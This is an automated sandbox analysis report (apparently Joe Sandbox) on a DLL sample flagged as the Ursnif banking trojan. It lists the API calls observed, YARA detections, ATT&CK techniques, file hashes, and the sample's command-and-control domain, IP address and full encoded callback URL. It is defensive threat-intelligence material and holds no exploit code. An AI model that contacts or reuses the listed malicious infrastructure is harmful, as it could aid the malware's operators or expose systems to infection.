            Source: C:\Windows\System32\loaddll32.exeCode function: EnumSystemLocalesW,0_2_6E22E3DC
            Source: C:\Windows\System32\loaddll32.exeCode function: _wcscmp,_wcscmp,GetLocaleInfoW,GetLocaleInfoW,GetACP,0_2_6E22E857
            Source: C:\Windows\System32\loaddll32.exeCode function: GetLocaleInfoW,_GetPrimaryLen,0_2_6E22E904
            Source: C:\Windows\System32\loaddll32.exeCode function: _TranslateName,_GetLocaleNameFromLangCountry,_GetLocaleNameFromLanguage,_TranslateName,_GetLocaleNameFromLangCountry,_GetLocaleNameFromLanguage,_GetLocaleNameFromDefault,IsValidCodePage,_wcschr,_wcschr,__itow_s,__invoke_watson,_LcidFromHexString,GetLocaleInfoW,0_2_6E22E168
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: GetLocaleInfoA,GetSystemDefaultUILanguage,VerLanguageNameA,4_2_6E1C1E8A
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: _LcidFromHexString,GetLocaleInfoW,_TestDefaultLanguage,4_2_6E22E72D
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: _GetPrimaryLen,EnumSystemLocalesW,4_2_6E22E438
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: _GetPrimaryLen,EnumSystemLocalesW,4_2_6E22E4B5
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: _LcidFromHexString,GetLocaleInfoW,GetLocaleInfoW,__wcsnicmp,GetLocaleInfoW,_TestDefaultLanguage,4_2_6E22E538
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: EnumSystemLocalesW,4_2_6E22ED13
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: GetLocaleInfoW,4_2_6E22ED99
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: _LocaleUpdate::_LocaleUpdate,__crtGetLocaleInfoA_stat,4_2_6E22FA7E
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: ___crtGetLocaleInfoA,GetLastError,___crtGetLocaleInfoA,__calloc_crt,___crtGetLocaleInfoA,__calloc_crt,_free,_free,__calloc_crt,_free,__invoke_watson,4_2_6E223BC0
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: EnumSystemLocalesW,4_2_6E22E3DC
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: _wcscmp,_wcscmp,GetLocaleInfoW,GetLocaleInfoW,GetACP,4_2_6E22E857
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: GetLocaleInfoW,_GetPrimaryLen,4_2_6E22E904
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: _TranslateName,_GetLocaleNameFromLangCountry,_GetLocaleNameFromLanguage,_TranslateName,_GetLocaleNameFromLangCountry,_GetLocaleNameFromLanguage,_GetLocaleNameFromDefault,IsValidCodePage,_wcschr,_wcschr,__itow_s,__invoke_watson,_LcidFromHexString,GetLocaleInfoW,4_2_6E22E168
            Source: C:\Windows\SysWOW64\rundll32.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion InstallDateJump to behavior
            Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6E1C1C7D SetThreadPriority,GetSystemTime,SwitchToThread,Sleep,GetLongPathNameW,GetLongPathNameW,GetLongPathNameW,WaitForSingleObject,GetExitCodeThread,CloseHandle,GetLastError,GetLastError,0_2_6E1C1C7D
            Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6E1C1F10 CreateEventA,GetVersion,GetCurrentProcessId,OpenProcess,GetLastError,0_2_6E1C1F10
            Source: C:\Windows\SysWOW64\rundll32.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

            Stealing of Sensitive Information:

            barindex
            Yara detected UrsnifShow sources
            Source: Yara matchFile source: 00000004.00000003.430352092.0000000005A58000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000002.464198146.0000000005A58000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000003.430424986.0000000005A58000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000003.430241635.0000000005A58000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000003.430313705.0000000005A58000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000003.430450163.0000000005A58000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000003.430406711.0000000005A58000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000003.430285928.0000000005A58000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000003.430372927.0000000005A58000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: rundll32.exe PID: 5328, type: MEMORY

            Remote Access Functionality:

            barindex
            Yara detected UrsnifShow sources
            Source: Yara matchFile source: 00000004.00000003.430352092.0000000005A58000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000002.464198146.0000000005A58000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000003.430424986.0000000005A58000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000003.430241635.0000000005A58000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000003.430313705.0000000005A58000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000003.430450163.0000000005A58000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000003.430406711.0000000005A58000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000003.430285928.0000000005A58000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000003.430372927.0000000005A58000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: rundll32.exe PID: 5328, type: MEMORY

            Mitre Att&ck Matrix

            Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
            Valid AccountsWindows Management Instrumentation1Path InterceptionProcess Injection12Masquerading1Input Capture1System Time Discovery1Remote ServicesInput Capture1Exfiltration Over Other Network MediumEncrypted Channel1Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
            Default AccountsNative API1Boot or Logon Initialization ScriptsBoot or Logon Initialization ScriptsProcess Injection12LSASS MemoryQuery Registry1Remote Desktop ProtocolArchive Collected Data1Exfiltration Over BluetoothIngress Tool Transfer3Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
            Domain AccountsAt (Linux)Logon Script (Windows)Logon Script (Windows)Deobfuscate/Decode Files or Information1Security Account ManagerSecurity Software Discovery3SMB/Windows Admin SharesData from Network Shared DriveAutomated ExfiltrationNon-Application Layer Protocol3Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
            Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)Obfuscated Files or Information2NTDSProcess Discovery1Distributed Component Object ModelInput CaptureScheduled TransferApplication Layer Protocol3SIM Card SwapCarrier Billing Fraud
            Cloud AccountsCronNetwork Logon ScriptNetwork Logon ScriptRundll321LSA SecretsFile and Directory Discovery1SSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
            Replication Through Removable MediaLaunchdRc.commonRc.commonSteganographyCached Domain CredentialsSystem Information Discovery24VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features

            Behavior Graph

            Hide Legend

            Legend:

            • Process
            • Signature
            • Created File
            • DNS/IP Info
            • Is Dropped
            • Is Windows Process
            • Number of created Registry Values
            • Number of created Files
            • Visual Basic
            • Delphi
            • Java
            • .Net C# or VB.NET
            • C, C++ or other language
            • Is malicious
            • Internet
            behaviorgraph top1 signatures2 2 Behavior Graph ID: 432910 Sample: SecuriteInfo.com..7135.20767 Startdate: 10/06/2021 Architecture: WINDOWS Score: 76 25 Multi AV Scanner detection for domain / URL 2->25 27 Found malware configuration 2->27 29 Antivirus detection for URL or domain 2->29 31 Yara detected  Ursnif 2->31 7 loaddll32.exe 1 2->7         started        9 iexplore.exe 2 60 2->9         started        process3 process4 11 rundll32.exe 7->11         started        14 cmd.exe 1 7->14         started        16 rundll32.exe 7->16         started        18 iexplore.exe 39 9->18         started        dnsIp5 33 Writes registry values via WMI 11->33 21 rundll32.exe 14->21         started        23 authd.feronok.com 185.233.80.31, 49748, 49749, 80 SUPERSERVERSDATACENTERRU Russian Federation 18->23 signatures6 process7

            Screenshots

            Thumbnails

            This section contains all screenshots as thumbnails, including those not shown in the slideshow.

            windows-stand

            Antivirus, Machine Learning and Genetic Malware Detection

            Initial Sample

            SourceDetectionScannerLabelLink
            SecuriteInfo.com..7135.dll4%VirustotalBrowse
            SecuriteInfo.com..7135.dll4%ReversingLabs

            Dropped Files

            No Antivirus matches

            Unpacked PE Files

            SourceDetectionScannerLabelLinkDownload
            5.2.rundll32.exe.4540000.1.unpack100%AviraHEUR/AGEN.1108168Download File
            4.2.rundll32.exe.3190000.1.unpack100%AviraHEUR/AGEN.1108168Download File

            Domains

            SourceDetectionScannerLabelLink
            authd.feronok.com11%VirustotalBrowse

            URLs

            SourceDetectionScannerLabelLink
            http://authd.feronok.com/INsgiuDpuLw85PPWCNwmsmw/LyIcaMF9BW/RDuesN3193oziv6jZ/21yngUSJZxlB/5U99_2BFq100%Avira URL Cloudmalware
            http://authd.feronok.com/INsgiuDpuLw85PPWCNwmsmw/LyIcaMF9BW/RDuesN3193oziv6jZ/21yngUSJZxlB/5U99_2BFq39/C9yL3XEqjGdzvV/F4wrCEliEtubK_2BQN3v0/mpD0sYBWj1_2BOoZ/MhYNZMroasOcyRm/Y7cgiiYGTmIYClS1bt/R_2BrGpes/V0WKbm6yczDyoBvOW06Z/_2FVUJ_2BtBEMJQ2mZ0/eqMRxCIXxJwUIjVA7qTLlE/f_2FwC5tmUPbh/r76jmp6x/obp7g2x_2BpjxmD9q5fMhKl/Y1cOMUM_2F/x9ahGBENuH7csdR7_/2FySnpeWZizz/XD203nXIqoX/COsoX4qlT56/jcBfJkpo100%Avira URL Cloudmalware

            Domains and IPs

            Contacted Domains

            NameIPActiveMaliciousAntivirus DetectionReputation
            authd.feronok.com
            185.233.80.31
            truetrueunknown

            Contacted URLs

            NameMaliciousAntivirus DetectionReputation
            http://authd.feronok.com/INsgiuDpuLw85PPWCNwmsmw/LyIcaMF9BW/RDuesN3193oziv6jZ/21yngUSJZxlB/5U99_2BFq39/C9yL3XEqjGdzvV/F4wrCEliEtubK_2BQN3v0/mpD0sYBWj1_2BOoZ/MhYNZMroasOcyRm/Y7cgiiYGTmIYClS1bt/R_2BrGpes/V0WKbm6yczDyoBvOW06Z/_2FVUJ_2BtBEMJQ2mZ0/eqMRxCIXxJwUIjVA7qTLlE/f_2FwC5tmUPbh/r76jmp6x/obp7g2x_2BpjxmD9q5fMhKl/Y1cOMUM_2F/x9ahGBENuH7csdR7_/2FySnpeWZizz/XD203nXIqoX/COsoX4qlT56/jcBfJkpotrue
            • Avira URL Cloud: malware
            unknown

            URLs from Memory and Binaries

            NameSourceMaliciousAntivirus DetectionReputation
            http://authd.feronok.com/INsgiuDpuLw85PPWCNwmsmw/LyIcaMF9BW/RDuesN3193oziv6jZ/21yngUSJZxlB/5U99_2BFq{FA4B99A6-CA78-11EB-90E4-ECF4BB862DED}.dat.23.dr, ~DF80E1CCC67DA5CD93.TMP.23.drtrue
            • Avira URL Cloud: malware
            unknown

            Contacted IPs

            • No. of IPs < 25%
            • 25% < No. of IPs < 50%
            • 50% < No. of IPs < 75%
            • 75% < No. of IPs

            Public

            IPDomainCountryFlagASNASN NameMalicious
            185.233.80.31
            authd.feronok.comRussian Federation
            50113SUPERSERVERSDATACENTERRUtrue

            General Information

            Joe Sandbox Version:32.0.0 Black Diamond
            Analysis ID:432910
            Start date:10.06.2021
            Start time:22:48:16
            Joe Sandbox Product:CloudBasic
            Overall analysis duration:0h 6m 35s
            Hypervisor based Inspection enabled:false
            Report type:full
            Sample file name:SecuriteInfo.com..7135.20767 (renamed file extension from 20767 to dll)
            Cookbook file name:default.jbs
            Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
            Number of analysed new started processes analysed:27
            Number of new started drivers analysed:0
            Number of existing processes analysed:0
            Number of existing drivers analysed:0
            Number of injected processes analysed:0
            Technologies:
            • HCA enabled
            • EGA enabled
            • HDC enabled
            • AMSI enabled
            Analysis Mode:default
            Analysis stop reason:Timeout
            Detection:MAL
            Classification:mal76.troj.winDLL@12/13@1/1
            EGA Information:Failed
            HDC Information:
            • Successful, ratio: 4.7% (good quality ratio 4.5%)
            • Quality average: 79.6%
            • Quality standard deviation: 28.5%
            HCA Information:
            • Successful, ratio: 71%
            • Number of executed functions: 26
            • Number of non-executed functions: 43
            Cookbook Comments:
            • Adjust boot time
            • Enable AMSI
            Warnings:
            Show All
            • Exclude process from analysis (whitelisted): taskhostw.exe, audiodg.exe, BackgroundTransferHost.exe, ielowutil.exe, RuntimeBroker.exe, backgroundTaskHost.exe, SgrmBroker.exe, WmiPrvSE.exe, svchost.exe, UsoClient.exe
            • Excluded IPs from analysis (whitelisted): 204.79.197.200, 13.107.21.200, 104.43.193.48, 13.88.21.125, 23.57.80.111, 205.185.216.10, 205.185.216.42, 51.103.5.159, 40.126.31.143, 40.126.31.6, 40.126.31.4, 20.190.159.132, 20.190.159.136, 40.126.31.135, 40.126.31.8, 40.126.31.139, 20.50.102.62, 20.54.26.129, 20.82.210.154, 92.122.213.247, 92.122.213.194, 88.221.62.148
            • Excluded domains from analysis (whitelisted): iris-de-prod-azsc-neu-b.northeurope.cloudapp.azure.com, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, a1449.dscg2.akamai.net, arc.msn.com, e11290.dspg.akamaiedge.net, wns.notify.trafficmanager.net, go.microsoft.com, login.live.com, www-bing-com.dual-a-0001.a-msedge.net, audownload.windowsupdate.nsatc.net, au.download.windowsupdate.com.hwcdn.net, arc.trafficmanager.net, watson.telemetry.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, prod.fs.microsoft.com.akadns.net, au-bg-shim.trafficmanager.net, www.bing.com, client.wns.windows.com, fs.microsoft.com, dual-a-0001.a-msedge.net, ris-prod.trafficmanager.net, e1723.g.akamaiedge.net, ctldl.windowsupdate.com, cds.d2s7q6s2.hwcdn.net, www.tm.a.prd.aadg.akadns.net, iris-de-prod-azsc-uks.uksouth.cloudapp.azure.com, login.msa.msidentity.com, skypedataprdcolcus15.cloudapp.net, ris.api.iris.microsoft.com, a-0001.a-afdentry.net.trafficmanager.net, blobcollector.events.data.trafficmanager.net, go.microsoft.com.edgekey.net, skypedataprdcolwus15.cloudapp.net, www.tm.lg.prod.aadmsa.trafficmanager.net
            • Not all processes where analyzed, report is missing behavior information
            • Report size getting too big, too many NtOpenKeyEx calls found.

            Simulations

            Behavior and APIs

            TimeTypeDescription
            22:50:25API Interceptor1x Sleep call for process: rundll32.exe modified

            Joe Sandbox View / Context

            IPs

            No context

            Domains

            MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
            authd.feronok.comHP7cjYBnlS.dllGet hashmaliciousBrowse
            • 47.254.173.212
            1.dllGet hashmaliciousBrowse
            • 34.95.62.189
            racial.dllGet hashmaliciousBrowse
            • 35.199.86.111
            racial.dllGet hashmaliciousBrowse
            • 35.199.86.111
            racial.dllGet hashmaliciousBrowse
            • 35.199.86.111
            racial.dllGet hashmaliciousBrowse
            • 35.199.86.111
            racial.dllGet hashmaliciousBrowse
            • 35.199.86.111
            racial.dllGet hashmaliciousBrowse
            • 35.199.86.111
            info_71411.vbsGet hashmaliciousBrowse
            • 35.199.86.111
            racial.dllGet hashmaliciousBrowse
            • 35.199.86.111
            racial.dllGet hashmaliciousBrowse
            • 35.199.86.111
            soft.dllGet hashmaliciousBrowse
            • 35.199.86.111
            racial.dllGet hashmaliciousBrowse
            • 35.199.86.111
            racial.dllGet hashmaliciousBrowse
            • 35.199.86.111
            Know.dllGet hashmaliciousBrowse
            • 35.199.86.111

            ASN

            MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
            SUPERSERVERSDATACENTERRU2 - #U041c#U0412#U0421 #U0423#U041a#U0420#U0410#U0407#U041d#U0418 - signed - (8uy).cplGet hashmaliciousBrowse
            • 46.17.104.120
            2 - #U041c#U0412#U0421 #U0423#U041a#U0420#U0410#U0407#U041d#U0418 - signed - (8uy).cplGet hashmaliciousBrowse
            • 46.17.104.120
            8s5P8pdch5.exeGet hashmaliciousBrowse
            • 185.233.81.8
            0CUmIGFwMf.exeGet hashmaliciousBrowse
            • 185.232.170.88
            y1e1FV1UWs.exeGet hashmaliciousBrowse
            • 185.232.170.88
            091WJ1BnKf.exeGet hashmaliciousBrowse
            • 45.144.64.230
            svchost10.exeGet hashmaliciousBrowse
            • 45.144.65.97
            index.exeGet hashmaliciousBrowse
            • 185.232.170.29
            NATO_042021-1re4.docGet hashmaliciousBrowse
            • 185.232.170.29
            8UOSzpl9E1.exeGet hashmaliciousBrowse
            • 185.180.231.94
            UWbkgpAQuS.exeGet hashmaliciousBrowse
            • 147.78.67.95
            9MyoOYNXKe.exeGet hashmaliciousBrowse
            • 185.195.27.245
            LJiW5jWnuA.exeGet hashmaliciousBrowse
            • 147.78.67.95
            tFqfAPK60I.exeGet hashmaliciousBrowse
            • 147.78.67.95
            svchost.exeGet hashmaliciousBrowse
            • 45.144.65.97
            m2.exeGet hashmaliciousBrowse
            • 45.144.64.88
            2.exeGet hashmaliciousBrowse
            • 45.144.64.88
            m4.exeGet hashmaliciousBrowse
            • 45.144.64.88
            4.exeGet hashmaliciousBrowse
            • 45.144.64.88
            YoOr2QDrm0.exeGet hashmaliciousBrowse
            • 185.255.132.7

            JA3 Fingerprints

            No context

            Dropped Files

            No context

            Created / dropped Files

            C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Recovery\High\Active\RecoveryStore.{FA4B99A4-CA78-11EB-90E4-ECF4BB862DED}.dat
            Process:C:\Program Files\internet explorer\iexplore.exe
            File Type:Microsoft Word Document
            Category:dropped
            Size (bytes):29272
            Entropy (8bit):1.7724986024352953
            Encrypted:false
            SSDEEP:384:rQt0h0zs0zNa0zNIy0zNIul0zNaMuXr0zuaMuB:Dm
            MD5:BB2CC967C3C6EDA44A69083EB767C117
            SHA1:DAC9F7F3B92917522249C29E661CF7ACF78847C2
            SHA-256:88AB7F2C9FAD173136BD458EB3523BCED520C008EC9208F4D665934C16BEED5C
            SHA-512:BFF393D1FF52DB8EB802AB96DB705CC3D05026156EEC92801C6697D1B383E8C051F85E313BD60EA73782CD1A63D1E7CE356E986C60CBA5C44C633E148EFC161A
            Malicious:false
            Reputation:low
            Preview: ................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................R.o.o.t. .E.n.t.r.y.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
            C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Recovery\High\Active\{FA4B99A6-CA78-11EB-90E4-ECF4BB862DED}.dat
            Process:C:\Program Files\internet explorer\iexplore.exe
            File Type:Microsoft Word Document
            Category:dropped
            Size (bytes):28148
            Entropy (8bit):1.924668728375893
            Encrypted:false
            SSDEEP:192:rVZ6Qe64kHjx25W6MOFL7fj4vd1L75Q7fje7MA:rb3pFDgo7SLjSHLyjAn
            MD5:14655AB8FC1D47B0C5998041E1946C6F
            SHA1:BF8356158D90869DE775D3EBAC100BD449C872E9
            SHA-256:4C387E86AA95C86898A353AAAF18A2E2BF0CA0A6F686641D280D5032A840DEFB
            SHA-512:078C5676E57A790B2BEC74462AFF7BECCEECB6C659F8BD6272D5A49C63DB56C335732DBC10E8210260CD09AD9C8CC7E839E36B2E5A0BEE4881BF4293701B439F
            Malicious:false
            Reputation:low
            Preview: ................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................R.o.o.t. .E.n.t.r.y.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
            C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\0W10PBUV\down[1]
            Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
            File Type:PNG image data, 15 x 15, 8-bit colormap, non-interlaced
            Category:downloaded
            Size (bytes):748
            Entropy (8bit):7.249606135668305
            Encrypted:false
            SSDEEP:12:6v/7/2QeZ7HVJ6o6yiq1p4tSQfAVFcm6R2HkZuU4fB4CsY4NJlrvMezoW2uONroc:GeZ6oLiqkbDuU4fqzTrvMeBBlE
            MD5:C4F558C4C8B56858F15C09037CD6625A
            SHA1:EE497CC061D6A7A59BB66DEFEA65F9A8145BA240
            SHA-256:39E7DE847C9F731EAA72338AD9053217B957859DE27B50B6474EC42971530781
            SHA-512:D60353D3FBEA2992D96795BA30B20727B022B9164B2094B922921D33CA7CE1634713693AC191F8F5708954544F7648F4840BCD5B62CB6A032EF292A8B0E52A44
            Malicious:false
            Reputation:high, very likely benign file
            IE Cache URL:res://ieframe.dll/down.png
            Preview: .PNG........IHDR...............ex....PLTE....W..W..W..W..W..W..W..W..W..W..W..W..W.U..............W..W.!Y.#Z.$\.'].<r.=s.P..Q..Q..U..o..p..r..x..z..~.............................................b.............................................................................................................................................................................................................$..s...7tRNS.a.o(,.s....e......q*...................................F.Z....IDATx^%.S..@.C..jm.mTk...m.?|;.y..S....F.t...,.......D.>..LpX=f.M...H4........=...=..xy.[h..7....7.....<.q.kH....#+....I..z.....'.ksC...X<.+..J>....%3BmqaV...h..Z._.:<.Y_jG...vN^.<>.Nu.u@.....M....?...1D.m~)s8..&....IEND.B`.
            C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\0W10PBUV\errorPageStrings[1]
            Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
            File Type:UTF-8 Unicode (with BOM) text, with CRLF line terminators
            Category:downloaded
            Size (bytes):4720
            Entropy (8bit):5.164796203267696
            Encrypted:false
            SSDEEP:96:z9UUiqRxqH211CUIRgRLnRynjZbRXkRPRk6C87Apsat/5/+mhPcF+5g+mOQb7A9o:JsUOG1yNlX6ZzWpHOWLia16Cb7bk
            MD5:D65EC06F21C379C87040B83CC1ABAC6B
            SHA1:208D0A0BB775661758394BE7E4AFB18357E46C8B
            SHA-256:A1270E90CEA31B46432EC44731BF4400D22B38EB2855326BF934FE8F1B169A4F
            SHA-512:8A166D26B49A5D95AEA49BC649E5EA58786A2191F4D2ADAC6F5FBB7523940CE4482D6A2502AA870A931224F215CB2010A8C9B99A2C1820150E4D365CAB28299E
            Malicious:false
            Reputation:high, very likely benign file
            IE Cache URL:res://ieframe.dll/errorPageStrings.js
            Preview: .//Split out for localization...var L_GOBACK_TEXT = "Go back to the previous page.";..var L_REFRESH_TEXT = "Refresh the page.";..var L_MOREINFO_TEXT = "More information";..var L_OFFLINE_USERS_TEXT = "For offline users";..var L_RELOAD_TEXT = "Retype the address.";..var L_HIDE_HOTKEYS_TEXT = "Hide tab shortcuts";..var L_SHOW_HOTKEYS_TEXT = "Show more tab shortcuts";..var L_CONNECTION_OFF_TEXT = "You are not connected to the Internet. Check your Internet connection.";..var L_CONNECTION_ON_TEXT = "It appears you are connected to the Internet, but you might want to try to reconnect to the Internet.";....//used by invalidcert.js and hstscerterror.js..var L_CertUnknownCA_TEXT = "Your PC doesn\u2019t trust this website\u2019s security certificate.";..var L_CertExpired_TEXT = "The website\u2019s security certificate is not yet valid or has expired.";..var L_CertCNMismatch_TEXT = "The hostname in the website\u2019s security certificate differs from the website you are trying to visit.";..var L
            C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\MEEXW4H4\ErrorPageTemplate[1]
            Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
            File Type:UTF-8 Unicode (with BOM) text, with CRLF line terminators
            Category:downloaded
            Size (bytes):2168
            Entropy (8bit):5.207912016937144
            Encrypted:false
            SSDEEP:24:5+j5xU5k5N0ndgvoyeP0yyiyQCDr3nowMVworDtX3orKxWxDnCMA0da+hieyuSQK:5Q5K5k5pvFehWrrarrZIrHd3FIQfOS6
            MD5:F4FE1CB77E758E1BA56B8A8EC20417C5
            SHA1:F4EDA06901EDB98633A686B11D02F4925F827BF0
            SHA-256:8D018639281B33DA8EB3CE0B21D11E1D414E59024C3689F92BE8904EB5779B5F
            SHA-512:62514AB345B6648C5442200A8E9530DFB88A0355E262069E0A694289C39A4A1C06C6143E5961074BFAC219949102A416C09733F24E8468984B96843DC222B436
            Malicious:false
            Reputation:high, very likely benign file
            IE Cache URL:res://ieframe.dll/ErrorPageTemplate.css
            Preview: .body..{...font-family: "Segoe UI", "verdana", "arial";...background-image: url(background_gradient.jpg);...background-repeat: repeat-x;...background-color: #E8EAEF;...margin-top: 20px;...margin-left: 20px;...color: #575757;..}....body.securityError..{...font-family: "Segoe UI", "verdana" , "Arial";...background-image: url(background_gradient_red.jpg);...background-repeat: repeat-x;...background-color: #E8EAEF;...margin-top: 20px;...margin-left: 20px;..}....body.tabInfo..{...background-image: none;...background-color: #F4F4F4;..}.. ..a..{...color: rgb(19,112,171);.font-size: 1em;...font-weight: normal;...text-decoration: none;...margin-left: 0px;...vertical-align: top;..}....a:link, a:visited..{...color: rgb(19,112,171);...text-decoration: none;...vertical-align: top;..}....a:hover..{...color: rgb(7,74,229);...text-decoration: underline;..}....p..{...font-size: 0.9em;..}.....h1 /* used for Title */..{...color: #4465A2;...font-size: 1.1em;...font-weight: normal;...vertical-align
            C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\MEEXW4H4\bullet[1]
            Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
            File Type:PNG image data, 15 x 15, 8-bit colormap, non-interlaced
            Category:downloaded
            Size (bytes):447
            Entropy (8bit):7.304718288205936
            Encrypted:false
            SSDEEP:12:6v/71Cyt/JNTWxGdr+kZDWO7+4dKIv0b1GKuxu+R:/yBJNTqsSk9BTwE05su+R
            MD5:26F971D87CA00E23BD2D064524AEF838
            SHA1:7440BEFF2F4F8FABC9315608A13BF26CABAD27D9
            SHA-256:1D8E5FD3C1FD384C0A7507E7283C7FE8F65015E521B84569132A7EABEDC9D41D
            SHA-512:C62EB51BE301BB96C80539D66A73CD17CA2021D5D816233853A37DB72E04050271E581CC99652F3D8469B390003CA6C62DAD2A9D57164C620B7777AE99AA1B15
            Malicious:false
            IE Cache URL:res://ieframe.dll/bullet.png
            Preview: .PNG........IHDR...............ex....PLTE...(EkFRp&@e&@e)Af)AgANjBNjDNjDNj2Vv-Xz-Y{3XyC\}E_.2j.3l.8p.7q.;j.;l.Zj.\l.5o.7q.<..aw.<..dz.E...........1..@.7..~.....9..:.....A..B..E..9..:..a..c..b..g.#M.%O.#r.#s.%y.2..4..+..-..?..@..;..p..s...G..H..M.........z`....#tRNS................................../,....mIDATx^..C..`.......S....y'...05...|..k.X......*`.F.K....JQ..u.<.}.. ..[U..m....'r%.......yn.`.7F..).5..b..rX.T.....IEND.B`.
            C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PSUEOSZZ\background_gradient[1]
            Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
            File Type:JPEG image data, JFIF standard 1.02, aspect ratio, density 100x100, segment length 16, baseline, precision 8, 1x800, frames 3
            Category:downloaded
            Size (bytes):453
            Entropy (8bit):5.019973044227213
            Encrypted:false
            SSDEEP:6:3llVuiPjlXJYhg5suRd8PImMo23C/kHrJ8yA/NIeYoWg78C/vTFvbKLAh3:V/XPYhiPRd8j7+9LoIrobtHTdbKi
            MD5:20F0110ED5E4E0D5384A496E4880139B
            SHA1:51F5FC61D8BF19100DF0F8AADAA57FCD9C086255
            SHA-256:1471693BE91E53C2640FE7BAEECBC624530B088444222D93F2815DFCE1865D5B
            SHA-512:5F52C117E346111D99D3B642926139178A80B9EC03147C00E27F07AAB47FE38E9319FE983444F3E0E36DEF1E86DD7C56C25E44B14EFDC3F13B45EDEDA064DB5A
            Malicious:false
            IE Cache URL:res://ieframe.dll/background_gradient.jpg
            Preview: ......JFIF.....d.d......Ducky.......P......Adobe.d................................................................................................................................................. ...............W..............................................................Qa.................................?......%.....x......s...Z.......j.T.wz.6...X.@... V.3tM...P@.u.%...m..D.25...T...F.........p......A..........BP..qD.(.........ntH.@......h?..
            C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PSUEOSZZ\httpErrorPagesScripts[1]
            Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
            File Type:UTF-8 Unicode (with BOM) text, with CRLF line terminators
            Category:downloaded
            Size (bytes):12105
            Entropy (8bit):5.451485481468043
            Encrypted:false
            SSDEEP:192:x20iniOciwd1BtvjrG8tAGGGVWnvyJVUrUiki3ayimi5ezLCvJG1gwm3z:xPini/i+1Btvjy815ZVUwiki3ayimi5f
            MD5:9234071287E637F85D721463C488704C
            SHA1:CCA09B1E0FBA38BA29D3972ED8DCECEFDEF8C152
            SHA-256:65CC039890C7CEB927CE40F6F199D74E49B8058C3F8A6E22E8F916AD90EA8649
            SHA-512:87D691987E7A2F69AD8605F35F94241AB7E68AD4F55AD384F1F0D40DC59FFD1432C758123661EE39443D624C881B01DCD228A67AFB8700FE5E66FC794A6C0384
            Malicious:false
            IE Cache URL:res://ieframe.dll/httpErrorPagesScripts.js
